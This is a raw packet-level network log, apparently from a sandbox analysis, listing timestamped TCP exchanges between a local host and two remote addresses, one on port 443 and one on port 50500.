May 24, 2024 00:21:56.320456028 CEST	49712	443	192.168.2.6	104.26.5.15
May 24, 2024 00:21:56.320494890 CEST	443	49712	104.26.5.15	192.168.2.6
May 24, 2024 00:21:56.320574045 CEST	49712	443	192.168.2.6	104.26.5.15
May 24, 2024 00:21:56.320871115 CEST	49712	443	192.168.2.6	104.26.5.15
May 24, 2024 00:21:56.320883989 CEST	443	49712	104.26.5.15	192.168.2.6
May 24, 2024 00:21:56.801606894 CEST	443	49712	104.26.5.15	192.168.2.6
May 24, 2024 00:21:56.801752090 CEST	49712	443	192.168.2.6	104.26.5.15
May 24, 2024 00:21:56.804095030 CEST	49712	443	192.168.2.6	104.26.5.15
May 24, 2024 00:21:56.804109097 CEST	443	49712	104.26.5.15	192.168.2.6
May 24, 2024 00:21:56.804354906 CEST	443	49712	104.26.5.15	192.168.2.6
May 24, 2024 00:21:56.805360079 CEST	49712	443	192.168.2.6	104.26.5.15
May 24, 2024 00:21:56.850501060 CEST	443	49712	104.26.5.15	192.168.2.6
May 24, 2024 00:21:57.023330927 CEST	443	49712	104.26.5.15	192.168.2.6
May 24, 2024 00:21:57.023423910 CEST	443	49712	104.26.5.15	192.168.2.6
May 24, 2024 00:21:57.023588896 CEST	49712	443	192.168.2.6	104.26.5.15
May 24, 2024 00:21:57.024374008 CEST	49712	443	192.168.2.6	104.26.5.15
May 24, 2024 00:21:57.024401903 CEST	443	49712	104.26.5.15	192.168.2.6
May 24, 2024 00:21:57.024420023 CEST	49712	443	192.168.2.6	104.26.5.15
May 24, 2024 00:21:57.024427891 CEST	443	49712	104.26.5.15	192.168.2.6
May 24, 2024 00:21:57.024940014 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:21:57.086596012 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:57.271173000 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:57.325335979 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:21:57.356900930 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:21:57.379394054 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:57.574260950 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:57.575522900 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:21:57.581285954 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:57.810528040 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:57.856724024 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:21:57.903733969 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:21:57.908840895 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:58.106719971 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:58.122690916 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:21:58.215354919 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:58.367794037 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:58.419261932 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.815742016 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.820621014 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.875350952 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.875369072 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.875382900 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.875392914 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.875403881 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.875415087 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.875426054 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.875437021 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.875447989 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.875459909 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.875469923 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.875669956 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.881793022 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.881871939 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.890059948 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.890105963 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.890145063 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.890182018 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.890202999 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.890219927 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.890252113 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.890259981 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.890352011 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.895215034 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.895344973 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.900042057 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.900090933 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.900125027 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.900130033 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.900176048 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.900218964 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.900257111 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.900274992 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.900413036 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.904819012 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.904870987 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.904891968 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.904911995 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.904948950 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.904957056 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.905013084 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.906302929 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906343937 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906380892 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906418085 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906440973 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.906455994 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906480074 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.906527996 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906534910 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.906568050 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906594038 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.906606913 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906646013 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906667948 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.906685114 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906708956 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.906723022 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906739950 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.906760931 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906788111 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.906800032 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906812906 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.906838894 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906864882 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.906878948 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906891108 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.906917095 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906953096 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.906980038 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.906991005 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.907020092 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.907030106 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.907052040 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.907068968 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.907080889 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.907107115 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.907176971 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908188105 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908235073 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908261061 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908273935 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908288956 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908312082 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908329964 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908349991 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908366919 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908387899 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908418894 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908427954 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908449888 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908464909 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908478975 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908503056 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908521891 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908540964 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908559084 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908580065 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908596992 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908617973 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908638954 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908657074 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908668041 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908694983 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908726931 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908732891 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908755064 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908771992 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908792019 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908823013 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908834934 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908862114 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908885956 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908901930 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908915043 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908940077 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908962011 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.908978939 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.908991098 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.909020901 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.909046888 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.909079075 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.910113096 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.910160065 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.910243034 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913068056 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913109064 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913146973 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913183928 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913194895 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913223028 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913227081 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913249969 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913259983 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913270950 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913299084 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913326025 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913336992 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913352966 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913374901 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913388968 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913413048 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913435936 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913450956 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913461924 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913489103 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913512945 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913530111 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913541079 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913568020 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913599968 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913606882 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913628101 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913645983 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913664103 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913686991 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913718939 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913724899 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913743019 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913763046 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913789034 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913803101 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913840055 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.913866043 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.913923025 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915055990 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915102005 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915138960 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915174961 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915178061 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915210962 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915220022 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915242910 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915258884 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915297985 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915324926 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915337086 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915361881 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915374994 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915400028 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915412903 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915440083 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915451050 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915463924 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915489912 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915527105 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915558100 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915565968 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915596008 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915604115 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915621042 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915642023 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915656090 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915679932 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915699005 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915719032 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915741920 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915756941 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915767908 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915795088 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915816069 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915832996 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915852070 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.915872097 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.915888071 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917100906 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917145967 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917182922 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917207003 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917223930 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917239904 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917263031 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917273998 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917301893 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917320013 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917341948 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917363882 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917380095 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917393923 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917416096 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917442083 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917455912 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917494059 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917521000 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917534113 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917550087 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917572021 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917593956 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917608023 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917625904 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917646885 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917684078 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917711020 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917721987 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917746067 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917761087 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917776108 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917798996 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917823076 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917835951 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917851925 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917874098 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.917896032 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.917927027 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.919076920 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919120073 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919152975 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.919158936 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919193029 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.919202089 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919238091 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.919243097 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919265985 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.919280052 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919294119 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.919318914 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919354916 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919378996 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.919394970 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919426918 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.919435978 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919452906 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.919473886 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919543028 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.919800997 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919842005 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919879913 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919905901 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.919920921 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919944048 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.919959068 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.919975996 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.919997931 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920032978 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920057058 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.920073032 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920094967 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.920111895 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920139074 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.920150995 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920164108 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.920187950 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920226097 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920243979 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.920264006 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920284033 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.920303106 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920330048 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.920341015 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920361042 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.920378923 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920391083 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.920418024 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920454979 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920485973 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.920495987 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920521975 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.920532942 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920552969 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.920572042 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:22:00.920593977 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:22:00.920627117 CEST	49710	50500	192.168.2.6	5.42.65.116
